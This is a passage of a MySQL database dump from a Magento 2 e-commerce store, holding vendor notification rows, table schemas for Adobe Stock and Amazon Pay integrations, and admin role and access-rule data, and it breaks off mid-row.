out','https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12',0,0),(50,4,'2020-08-11 16:54:10','Turn your website into a conversion machine. Don\'t miss this week\'s webinar on Aug 13th! ','Join us on Aug 13 for our webinar: Is Your Website Selling As Much As It Can? Adobe Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Register now: https://bit.ly/2PcjcL3','https://bit.ly/2PcjcL3',0,0),(51,4,'2020-08-24 17:19:20','We would love your input on Magento Payments','We value the perspective of our users and we would appreciate if you took this short survey on Magento Payments. Your response will influence the design of the next generation Magento Payments solution. https://bit.ly/2CXZro2','https://bit.ly/2CXZro2',0,0),(52,4,'2020-08-11 16:54:10','Turn your website into a conversion machine. ','Join us on Aug 13 for our webinar: Is Your Website Selling As Much As It Can? Adobe Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Register now: https://bit.ly/2PcjcL3','https://bit.ly/2PcjcL3',0,0),(53,4,'2020-09-14 13:33:10','Get real-time insights into the security status of the store​ with Enhanced Security Scan Tool.','The Enhanced Magento Security Scan Tool provides our on-prem and cloud merchants with real-time insights into the security status of their store by proactively notifying them if their store is vulnerable. ','https://account.magento.com/scanner ',0,0),(54,4,'2020-09-14 13:37:29','Now Available: Magento Quality Patch (MQP) tool to identify and resolve issues more quickly','The introduction of the MQP tool provides a way for you to know which quality patches are available for you installed version and apply or revert them giving you self-service access to resolve issues more quickly.','https://support.magento.com/hc/en-us/articles/360047139492-Magento-Quality-Patches-released-a-new-tool-to-self-serve-quality-patches',0,0),(55,4,'2020-09-16 18:03:56','Free 25-Point Website Evaluation for Magento Open Source Users','​Reach out to us today to get your free 25-point site assessment to identify top conversion drivers and turn your website into a conversion machine.​ Our team of experts will evaluate your site and identify specific areas for conversion improvements. https://bit.ly/3lcgILt','https://bit.ly/3lcgILt',0,0),(56,4,'2020-09-21 17:18:39','New resource updates to the Open Source page on Magento.com. ','Check out the updated Open Source page on Magento.com. Learn how to maximize your Open Source store, discover offers for Open Source merchants, and view comparison charts between Open Source and Magento Commerce. Go to page: https://adobe.ly/3kCB5jW','https://adobe.ly/3kCB5jW',0,0),(57,4,'2020-09-25 01:48:09','Don\'t miss Adobe Developer\'s Live: Commerce which brings together developers and experience builders in a one-day free conference on Monday, Sept 28th. ','The one-day free conference will feature important Magento developer updates, technical sessions and community networking opportunities. Adobe product teams across Adobe Experience Cloud will showcase the latest tech advances and developer tools powering customer experience management across industries. Register now: https://bit.ly/3hYzbrX','https://bit.ly/3hYzbrX',0,0),(58,4,'2020-09-28 22:07:26','Is Your Website Selling as Much as It Can? Watch our on-demand webinar and learn how to turn your website into a conversion machine.','Watch our on-demand webinar: Is Your Website Selling As Much As It Can? Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Watch now: https://bit.ly/2EAujMc','https://bit.ly/2EAujMc',0,0),(59,1,'2021-01-05 06:25:05','Attention! Your Blog extension version is extremely outdated. It is strongly recommended to update it to the latest version 2.9.7',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.9.1                                 ','https://magefan.com/magento2-blog-extension?ancient=2.9.1',0,0),(60,4,'2020-10-06 16:53:57','[Webinar] Is your site to ready to handle spikes in traffic and transactions? ','Your site speed can make or break your conversion rate this holiday season and beyond. Join us on October 15th for a fireside chat &quot;Is Your Website Ready for the 2020 Holiday Season?&quot; to learn what Commerce features you must have, and how to scale your webstore to maximize conversion rates. If you can\'t make the live webinar, be sure to register anyway and we\'ll send you the recording and slides afterward. Register today: https://bit.ly/33wzXbC','https://bit.ly/33wzXbC',0,0),(61,4,'2020-11-02 16:19:52','2021 Planning - reach out to us today to get your free site assessment to identify top conversion drivers.  ','Considering moving to Magento Commerce in 2021? Would you like a demo or free site assessment? Our team of experts would love to help. Get started now. https://bit.ly/3lcgILt','https://bit.ly/3lcgILt',0,0),(62,4,'2020-11-04 14:28:07','Please help prioritize our roadmap - SHORT survey','We are looking to better understand how we can help you manage all of your digital ecommerce from one place. Please help us prioritize our roadmap! Very short survey is here! http://selfserve.decipherinc.com/survey/selfserve/9d5/201000','http://selfserve.decipherinc.com/survey/selfserve/9d5/201000',0,0),(63,4,'2020-11-23 19:59:51','Upgrade to Magento Commerce quickly with Rapid Deployment Packages','Our experienced solution partners offer special design and implementation packages for businesses to upgrade their site quickly and cost effectively. Learn More: https://adobe.ly/3nqaXKx','https://adobe.ly/3nqaXKx',0,0),(64,4,'2020-12-01 22:02:47','[Video] Fuel Your Business Growth with Magento Commerce','Follow along as our friends at Goodacre Farm &amp; Supply transform their business into a cloud-based eCommerce machine with easy content creation, support for multiple web stores, and personalized product recommendations. Watch Now: https://bit.ly/3m8S2mW','https://bit.ly/3m8S2mW',0,0),(65,4,'2020-12-07 16:29:27','SURVEY: Business Financing and Support','Please complete if you are responsible for your business finances. We\'d like to hear from you about your past and future business financing needs. Strictly confidential.','http://selfserve.decipherinc.com/survey/selfserve/9d5/g30c/201100',0,0),(66,4,'2020-12-11 00:37:39','Experience the new Interactive Tour to compare Open Source and Magento Commerce.','Create closer consumer connections in the New Year. Explore our interactive product simulation and learn how Magento Commerce delivers everything you need to drive growth in an increasingly competitive online market. https://adobe.ly/3okS1wS','https://adobe.ly/3okS1wS',0,0),(67,4,'2021-01-08 21:35:55','Happy new year! Is Your Website Selling as Much as It Can? Watch our on-demand webinar and learn how to turn your website into a conversion machine.','Watch our on-demand webinar: Is Your Website Selling As Much As It Can? Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Watch now: https://bit.ly/2EAujMc','https://bit.ly/2EAujMc',0,0),(68,4,'2021-01-14 01:32:42','You\'re invited to our webinar: Is Magento Commerce or Open Source right for you? ','Magento Commerce and Magento Open Source may sound alike, but each offers sharply distinct benefits. To get the facts, sign up for our webinar Is Magento Commerce or Open Source right for you? at 10:00 AM PT on February 4th. Register now: http://bit.ly/3icfnTM','http://bit.ly/3icfnTM',0,0),(69,4,'2021-02-04 05:43:28','NEW Magento 2 Zero Downtime Deployment Extension.',' Do you hate to see when your store is broken while running Magento 2 deployment commands? Install New Zero Downtime Deployment extension and forget about it. Deploy new features and bug fixes without interrupting your customers.','https://magefan.com/magento-2-zero-downtime-deployment?from=ntf-new',0,0),(70,4,'2021-02-10 15:06:05','Magento Commerce 2.4.2 delivers important security updates and features to help secure and optimize your store','Magento Open Source 2.4.2, along with security-only patches 2.3.6-p1 and 2.4.1-p1, is now generally available. The latest release of Magento Open Source includes important security enhancements along with new functionality and platform quality improvements. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the enhancements. Learn how this release can help you save time and maximize resources at Magento.com/blog. ','https://devdocs.magento.com/guides/v2.4/release-notes/bk-release-notes.html',0,0),(71,4,'2021-02-10 15:08:37','Register now for Summit 2021 and stay ahead of commerce trends ','Learn best practices from digital commerce experts during two days of live keynotes, sessions, and sneak peeks. Understand the latest digital commerce trends, discover industry best practices, and network with peers around the world. Register now!','https://summit.adobe.com/na/?utm_source=m1o&amp;utm_medium=rss&amp;utm_campaign=NA_210427_12576_RSS_EVTR_ACOM_FM_Summit_2021_M1_OS',0,0),(72,4,'2021-02-22 23:52:27','Quarterly Business Planning - reach out to us today to get your free site assessment.','Would you like a free site assessment? Our best-in-breed commerce solution gives your business unmatched agility and scalability. It\'s time to experience limitless eCommerce with no comprises. Learn more: https://bit.ly/3lcgILt','https://bit.ly/3lcgILt',0,0),(73,1,'2021-02-25 14:37:10','Attention! Your Blog extension version is extremely outdated. It is strongly recommended to update it to the latest version 2.9.8',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.9.1                                 ','https://magefan.com/magento2-blog-extension?ancient=2.9.1',0,0),(74,4,'2021-03-23 00:33:54','You\'re invited to our webinar this week: How digital commerce can scale B2B selling','Digital commerce is fast becoming the default way to buy—even for B2B customers. In just 8 weeks, Byrne Electrical, the leading manufacturer of power and data solutions for numerous industries, launched an eCommerce portal for more than 1,100 of their customers. To learn how they did it, join George Fabis, Director of IT for Byrne, and Slava Kravchuk, CEO &amp; Founder of Atwix, a Magento Commerce solutions partner, for a live discussion on Thursday, March 25. Register Now: https://bit.ly/3r1MCvG','https://bit.ly/3r1MCvG',0,0),(75,4,'2024-01-14 15:45:57','Disable Notice','To improve performance, collecting statistics for the Magento Report module is disabled by default. \nYou can enable it in System Config.','',0,0),(76,1,'2024-01-14 16:51:01','Attention! Your Blog extension version is extremely outdated. It is strongly recommended to update it to the latest version 2.11.0',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.9.8                                 ','https://magefan.com/magento2-blog-extension?ancient=2.9.8',0,0);

--
-- Table structure for table `adobe_stock_asset`
--

CREATE TABLE `adobe_stock_asset` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `media_gallery_id` int(10) unsigned DEFAULT NULL COMMENT 'Media gallery ID',
  `category_id` int(10) unsigned DEFAULT NULL COMMENT 'Category ID',
  `creator_id` int(10) unsigned DEFAULT NULL COMMENT 'Creator ID',
  `is_licensed` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Is Licensed',
  `creation_date` varchar(255) DEFAULT NULL COMMENT 'Creation Date',
  PRIMARY KEY (`id`),
  KEY `ADOBE_STOCK_ASSET_MEDIA_GALLERY_ID_MEDIA_GALLERY_ASSET_ID` (`media_gallery_id`),
  KEY `ADOBE_STOCK_ASSET_ID` (`id`),
  KEY `ADOBE_STOCK_ASSET_CATEGORY_ID` (`category_id`),
  KEY `ADOBE_STOCK_ASSET_CREATOR_ID` (`creator_id`),
  CONSTRAINT `ADOBE_STOCK_ASSET_CATEGORY_ID_ADOBE_STOCK_CATEGORY_ID` FOREIGN KEY (`category_id`) REFERENCES `adobe_stock_category` (`id`) ON DELETE SET NULL,
  CONSTRAINT `ADOBE_STOCK_ASSET_CREATOR_ID_ADOBE_STOCK_CREATOR_ID` FOREIGN KEY (`creator_id`) REFERENCES `adobe_stock_creator` (`id`) ON DELETE SET NULL,
  CONSTRAINT `ADOBE_STOCK_ASSET_MEDIA_GALLERY_ID_MEDIA_GALLERY_ASSET_ID` FOREIGN KEY (`media_gallery_id`) REFERENCES `media_gallery_asset` (`id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Adobe Stock Asset';

--
-- Dumping data for table `adobe_stock_asset`
--


--
-- Table structure for table `adobe_stock_category`
--

CREATE TABLE `adobe_stock_category` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  PRIMARY KEY (`id`),
  KEY `ADOBE_STOCK_CATEGORY_ID` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Adobe Stock Category';

--
-- Dumping data for table `adobe_stock_category`
--


--
-- Table structure for table `adobe_stock_creator`
--

CREATE TABLE `adobe_stock_creator` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Asset creator''s name',
  PRIMARY KEY (`id`),
  KEY `ADOBE_STOCK_CREATOR_ID` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Adobe Stock Creator';

--
-- Dumping data for table `adobe_stock_creator`
--


--
-- Table structure for table `adobe_user_profile`
--

CREATE TABLE `adobe_user_profile` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `admin_user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Admin User Id',
  `name` varchar(255) NOT NULL COMMENT 'Display Name',
  `email` varchar(255) NOT NULL COMMENT 'user profile email',
  `image` varchar(255) NOT NULL COMMENT 'user profile avatar',
  `account_type` varchar(255) DEFAULT NULL COMMENT 'Account Type',
  `access_token` text DEFAULT NULL COMMENT 'Access Token',
  `refresh_token` text DEFAULT NULL COMMENT 'Refresh Token',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `access_token_expires_at` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Access Token Expires At',
  PRIMARY KEY (`id`),
  KEY `ADOBE_USER_PROFILE_ADMIN_USER_ID` (`admin_user_id`),
  CONSTRAINT `ADOBE_USER_PROFILE_ADMIN_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`admin_user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Adobe IMS User Profile';

--
-- Dumping data for table `adobe_user_profile`
--


--
-- Table structure for table `amazon_customer`
--

CREATE TABLE `amazon_customer` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `customer_id` int(10) unsigned NOT NULL COMMENT 'Customer_id',
  `amazon_id` varchar(255) NOT NULL COMMENT 'Amazon_id',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `AMAZON_CUSTOMER_CUSTOMER_ID_AMAZON_ID` (`customer_id`,`amazon_id`),
  UNIQUE KEY `AMAZON_CUSTOMER_CUSTOMER_ID` (`customer_id`),
  CONSTRAINT `AMAZON_CUSTOMER_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_customer';

--
-- Dumping data for table `amazon_customer`
--


--
-- Table structure for table `amazon_pending_authorization`
--

CREATE TABLE `amazon_pending_authorization` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order_id',
  `payment_id` int(10) unsigned NOT NULL COMMENT 'Payment_id',
  `authorization_id` varchar(255) DEFAULT NULL COMMENT 'Authorization_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `updated_at` datetime DEFAULT NULL COMMENT 'Updated_at',
  `processed` smallint(5) unsigned DEFAULT 0 COMMENT 'Initial authorization processed',
  `capture` smallint(5) unsigned DEFAULT 0 COMMENT 'Initial authorization has capture',
  `capture_id` varchar(255) DEFAULT NULL COMMENT 'Initial authorization capture id',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `UNQ_E6CCA08713FB32BB136A56837009C371` (`order_id`,`payment_id`,`authorization_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_pending_authorization';

--
-- Dumping data for table `amazon_pending_authorization`
--


--
-- Table structure for table `amazon_pending_capture`
--

CREATE TABLE `amazon_pending_capture` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `capture_id` varchar(255) NOT NULL COMMENT 'Capture_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `order_id` int(10) unsigned NOT NULL COMMENT 'order id',
  `payment_id` int(10) unsigned NOT NULL COMMENT 'payment id',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `AMAZON_PENDING_CAPTURE_ORDER_ID_PAYMENT_ID_CAPTURE_ID` (`order_id`,`payment_id`,`capture_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_pending_capture';

--
-- Dumping data for table `amazon_pending_capture`
--


--
-- Table structure for table `amazon_pending_refund`
--

CREATE TABLE `amazon_pending_refund` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `refund_id` varchar(255) NOT NULL COMMENT 'Refund_id',
  `created_at` datetime NOT NULL COMMENT 'Created_at',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order_id',
  `payment_id` int(10) unsigned NOT NULL COMMENT 'Payment_id',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `AMAZON_PENDING_REFUND_ORDER_ID_PAYMENT_ID_REFUND_ID` (`order_id`,`payment_id`,`refund_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_pending_refund';

--
-- Dumping data for table `amazon_pending_refund`
--


--
-- Table structure for table `amazon_quote`
--

CREATE TABLE `amazon_quote` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `quote_id` int(10) unsigned NOT NULL COMMENT 'Quote_id',
  `amazon_order_reference_id` varchar(255) NOT NULL COMMENT 'Amazon_order_reference_id',
  `sandbox_simulation_reference` varchar(255) DEFAULT NULL COMMENT 'Sandbox simulation reference',
  `confirmed` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Quote confirmed with Amazon',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `AMAZON_QUOTE_QUOTE_ID` (`quote_id`),
  CONSTRAINT `AMAZON_QUOTE_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_quote';

--
-- Dumping data for table `amazon_quote`
--


--
-- Table structure for table `amazon_sales_order`
--

CREATE TABLE `amazon_sales_order` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity_id',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order_id',
  `amazon_order_reference_id` varchar(255) NOT NULL COMMENT 'Amazon_order_reference_id',
  PRIMARY KEY (`entity_id`),
  UNIQUE KEY `AMAZON_SALES_ORDER_ORDER_ID` (`order_id`),
  CONSTRAINT `AMAZON_SALES_ORDER_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='amazon_sales_order';

--
-- Dumping data for table `amazon_sales_order`
--


--
-- Table structure for table `authorization_role`
--

CREATE TABLE `authorization_role` (
  `role_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Role ID',
  `parent_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Parent Role ID',
  `tree_level` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Role Tree Level',
  `sort_order` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Role Sort Order',
  `role_type` varchar(1) NOT NULL DEFAULT '0' COMMENT 'Role Type',
  `user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'User ID',
  `user_type` varchar(16) DEFAULT NULL COMMENT 'User Type',
  `role_name` varchar(50) DEFAULT NULL COMMENT 'Role Name',
  PRIMARY KEY (`role_id`),
  KEY `AUTHORIZATION_ROLE_PARENT_ID_SORT_ORDER` (`parent_id`,`sort_order`),
  KEY `AUTHORIZATION_ROLE_TREE_LEVEL` (`tree_level`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin Role Table';

--
-- Dumping data for table `authorization_role`
--

INSERT INTO `authorization_role` VALUES (1,0,1,1,'G',0,'2','Administrators'),(2,1,2,0,'U',1,'2','admin'),(3,0,1,0,'G',0,'2','Sales'),(4,3,2,0,'U',2,'2','Sales'),(5,1,2,0,'U',3,'2','pankajjha');

--
-- Table structure for table `authorization_rule`
--

CREATE TABLE `authorization_rule` (
  `rule_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Rule ID',
  `role_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Role ID',
  `resource_id` varchar(255) DEFAULT NULL COMMENT 'Resource ID',
  `privileges` varchar(20) DEFAULT NULL COMMENT 'Privileges',
  `permission` varchar(10) DEFAULT NULL COMMENT 'Permission',
  PRIMARY KEY (`rule_id`),
  KEY `AUTHORIZATION_RULE_RESOURCE_ID_ROLE_ID` (`resource_id`,`role_id`),
  KEY `AUTHORIZATION_RULE_ROLE_ID_RESOURCE_ID` (`role_id`,`resource_id`),
  CONSTRAINT `AUTHORIZATION_RULE_ROLE_ID_AUTHORIZATION_ROLE_ROLE_ID` FOREIGN KEY (`role_id`) REFERENCES `authorization_role` (`role_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=280 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin Rule Table';

--
-- Dumping data for table `authorization_rule`
--

INSERT INTO `authorization_rule` VALUES (1,1,'Magento_Backend::all',NULL,'allow'),(2,3,'Magento_Backend::all',NULL,'deny'),(3,3,'Magento_Backend::admin',NULL,'allow'),(4,3,'Magento_Backend::dashboard',NULL,'deny'),(5,3,'Magento_Analytics::analytics',NULL,'deny'),(6,3,'Magento_Analytics::analytics_api',NULL,'deny'),(7,3,'Magento_Sales::sales',NULL,'allow'),(8,3,'Magento_Sales::sales_operation',NULL,'allow'),(9,3,'Magento_Sales::sales_order',NULL,'allow'),(10,3,'Magento_Sales::actions',NULL,'allow'),(11,3,'Magento_Sales::create',NULL,'allow'),(12,3,'Magento_Sales::actions_view',NULL,'allow'),(13,3,'Magento_Sales::email',NULL,'allow'),(14,3,'Magento_Sales::reorder',NULL,'allow'),(15,3,'Magento_Sales::actions_edit',NULL,'allow'),(16,3,'Magento_Sales::cancel',NULL,'allow'),(17,3,'Magento_Sales::review_payment',NULL,'allow'),(18,3,'Magento_Sales::capture',NULL,'allow'),(19,3,'Magento_Sales::invoice',NULL,'allow'),(20,3,'Magento_Sales::creditmemo',NULL,'allow'),(21,3,'Magento_Sales::hold',NULL,'allow'),(22,3,'Magento_Sales::unhold',NULL,'allow'),(23,3,'Magento_Sales::ship',NULL,'allow'),(24,3,'Magento_Sales::comment',NULL,'allow'),(25,3,'Magento_Sales::emails',NULL,'allow'),(26,3,'Magento_Paypal::authorization',NULL,'allow'),(27,3,'Magento_Braintree::get_client_token',NULL,'allow'),(28,3,'Magento_Sales::sales_invoice',NULL,'allow'),(29,3,'Magento_Sales::shipment',NULL,'allow'),(30,3,'Temando_Shipping::dispatches',NULL,'allow'),(31,3,'Temando_Shipping::batches',NULL,'allow'),(32,3,'Magento_Sales::sales_creditmemo',NULL,'allow'),(33,3,'Magento_Paypal::billing_agreement',NULL,'allow'),(34,3,'Magento_Paypal::billing_agreement_actions',NULL,'allow'),(35,3,'Magento_Paypal::billing_agreement_actions_view',NULL,'allow'),(36,3,'Magento_Paypal::actions_manage',NULL,'allow'),(37,3,'Magento_Paypal::use',NULL,'allow'),(38,3,'Magento_Sales::transactions',NULL,'allow'),(39,3,'Magento_Sales::transactions_fetch',NULL,'allow'),(40,3,'Magento_Catalog::catalog',NULL,'allow'),(41,3,'Magento_Catalog::catalog_inventory',NULL,'allow'),(42,3,'Magento_Catalog::products',NULL,'allow'),(43,3,'Magento_Catalog::edit_product_design',NULL,'allow'),(44,3,'Magento_Catalog::categories',NULL,'allow'),(45,3,'Magento_Catalog::edit_category_design',NULL,'allow'),(46,3,'Magento_Customer::customer',NULL,'deny'),(47,3,'Magento_Customer::manage',NULL,'deny'),(48,3,'Magento_Customer::online',NULL,'deny'),(49,3,'Magento_Customer::group',NULL,'deny'),(50,3,'Magento_Cart::cart',NULL,'deny'),(51,3,'Magento_Cart::manage',NULL,'deny'),(52,3,'Plazathemes_Hozmegamenu::hozmegamenu',NULL,'allow'),(53,3,'Plazathemes_Bannerslider::bannerslider_bannerslider',NULL,'allow'),(54,3,'Plazathemes_Bannerslider::bannerslider_banners',NULL,'allow'),(55,3,'Plazathemes_Bannerslider::settings',NULL,'allow'),(56,3,'Plazathemes_Blog::elements',NULL,'allow'),(57,3,'Plazathemes_Blog::post',NULL,'allow'),(58,3,'Plazathemes_Blog::category',NULL,'allow'),(59,3,'Plazathemes_Brandslider::brandslider_brandslider',NULL,'deny'),(60,3,'Plazathemes_Brandslider::brandslider_brands',NULL,'deny'),(61,3,'Plazathemes_Brandslider::settings',NULL,'deny'),(62,3,'Plazathemes_Testimonial::testimonial',NULL,'deny'),(63,3,'Plazathemes_Testimonial::testimonial_testimos',NULL,'deny'),(64,3,'Plazathemes_Testimonial::settings',NULL,'deny'),(65,3,'Plazathemes_Themeoptions::themeoptions',NULL,'deny'),(66,3,'Plazathemes_Themeoptions::settings',NULL,'deny'),(67,3,'Plazathemes_Hozmegamenu::hozmegamenu_hozmegamenu',NULL,'deny'),(68,3,'Plazathemes_Hozmegamenu::items',NULL,'deny'),(69,3,'Plazathemes_Template::template',NULL,'deny'),(70,3,'Plazathemes_Template::items',NULL,'deny'),(71,3,'Magento_Backend::myaccount',NULL,'deny'),(72,3,'Magento_Backend::marketing',NULL,'allow'),(73,3,'Magento_CatalogRule::promo',NULL,'deny'),(74,3,'Magento_CatalogRule::promo_catalog',NULL,'deny'),(75,3,'Magento_SalesRule::quote',NULL,'deny'),(76,3,'Dotdigitalgroup_Email::automation',NULL,'deny'),(77,3,'Dotdigitalgroup_Email::automation_studio',NULL,'deny'),(78,3,'Dotdigitalgroup_Email::exclusion_rules',NULL,'deny'),(79,3,'Magento_Backend::marketing_communications',NULL,'deny'),(80,3,'Magento_Email::template',NULL,'deny'),(81,3,'Magento_Newsletter::template',NULL,'deny'),(82,3,'Magento_Newsletter::queue',NULL,'deny'),(83,3,'Magento_Newsletter::subscriber',NULL,'deny'),(84,3,'Magento_Backend::marketing_seo',NULL,'allow'),(85,3,'Magento_Search::search',NULL,'allow'),(86,3,'Magento_Search::synonyms',NULL,'allow'),(87,3,'Magento_UrlRewrite::urlrewrite',NULL,'allow'),(88,3,'Magento_Sitemap::sitemap',NULL,'allow'),(89,3,'Magento_Backend::marketing_user_content',NULL,'deny'),(90,3,'Magento_Review::reviews_all',NULL,'deny'),(91,3,'Magento_Review::pending',NULL,'deny'),(92,3,'Magento_Backend::content',NULL,'allow'),(93,3,'Magento_Backend::content_elements',NULL,'allow'),(94,3,'Magento_Cms::page',NULL,'allow'),(95,3,'Magento_Cms::save',NULL,'allow'),(96,3,'Magento_Cms::save_design',NULL,'allow'),(97,3,'Magento_Cms::page_delete',NULL,'allow'),(98,3,'Magento_Cms::block',NULL,'allow'),(99,3,'Magento_Widget::widget_instance',NULL,'allow'),(100,3,'Magento_Cms::media_gallery',NULL,'allow'),(101,3,'Magento_Backend::design',NULL,'allow'),(102,3,'Magento_Theme::theme',NULL,'allow'),(103,3,'Magento_Backend::schedule',NULL,'allow'),(104,3,'Magento_Backend::content_translation',NULL,'allow'),(105,3,'Magento_Reports::report',NULL,'allow'),(106,3,'Dotdigitalgroup_Email::reports',NULL,'deny'),(107,3,'Dotdigitalgroup_Email::contact',NULL,'deny'),(108,3,'Dotdigitalgroup_Email::order',NULL,'deny'),(109,3,'Dotdigitalgroup_Email::review',NULL,'deny'),(110,3,'Dotdigitalgroup_Email::wishlist',NULL,'deny'),(111,3,'Dotdigitalgroup_Email::catalog',NULL,'deny'),(112,3,'Dotdigitalgroup_Email::importer',NULL,'deny'),(113,3,'Dotdigitalgroup_Email::campaign',NULL,'deny'),(114,3,'Dotdigitalgroup_Email::cron',NULL,'deny'),(115,3,'Dotdigitalgroup_Email::dashboard',NULL,'deny'),(116,3,'Dotdigitalgroup_Email::automation_enrollment',NULL,'deny'),(117,3,'Dotdigitalgroup_Email::logviewer',NULL,'deny'),(118,3,'Magento_Reports::report_marketing',NULL,'deny'),(119,3,'Magento_Reports::shopcart',NULL,'deny'),(120,3,'Magento_Reports::product',NULL,'deny'),(121,3,'Magento_Reports::abandoned',NULL,'deny'),(122,3,'Magento_Reports::report_search',NULL,'deny'),(123,3,'Magento_Newsletter::problem',NULL,'deny'),(124,3,'Magento_Reports::review',NULL,'deny'),(125,3,'Magento_Reports::review_customer',NULL,'deny'),(126,3,'Magento_Reports::review_product',NULL,'deny'),(127,3,'Magento_Reports::salesroot',NULL,'allow'),(128,3,'Magento_Reports::salesroot_sales',NULL,'allow'),(129,3,'Magento_Reports::tax',NULL,'allow'),(130,3,'Magento_Reports::invoiced',NULL,'allow'),(131,3,'Magento_Reports::shipping',NULL,'allow'),(132,3,'Magento_Reports::refunded',NULL,'allow'),(133,3,'Magento_Reports::coupons',NULL,'allow'),(134,3,'Magento_Paypal::paypal_settlement_reports',NULL,'allow'),(135,3,'Magento_Paypal::paypal_settlement_reports_view',NULL,'allow'),(136,3,'Magento_Paypal::fetch',NULL,'allow'),(137,3,'Magento_Braintree::settlement_report',NULL,'allow'),(138,3,'Magento_Reports::customers',NULL,'deny'),(139,3,'Magento_Reports::totals',NULL,'deny'),(140,3,'Magento_Reports::customers_orders',NULL,'deny'),(141,3,'Magento_Reports::accounts',NULL,'deny'),(142,3,'Magento_Reports::report_products',NULL,'deny'),(143,3,'Magento_Reports::viewed',NULL,'deny'),(144,3,'Magento_Reports::bestsellers',NULL,'deny'),(145,3,'Magento_Reports::lowstock',NULL,'deny'),(146,3,'Magento_Reports::sold',NULL,'deny'),(147,3,'Magento_Reports::downloads',NULL,'deny'),(148,3,'Magento_Reports::statistics',NULL,'deny'),(149,3,'Magento_Reports::statistics_refresh',NULL,'deny'),(150,3,'Magento_Analytics::business_intelligence',NULL,'deny'),(151,3,'Magento_Analyti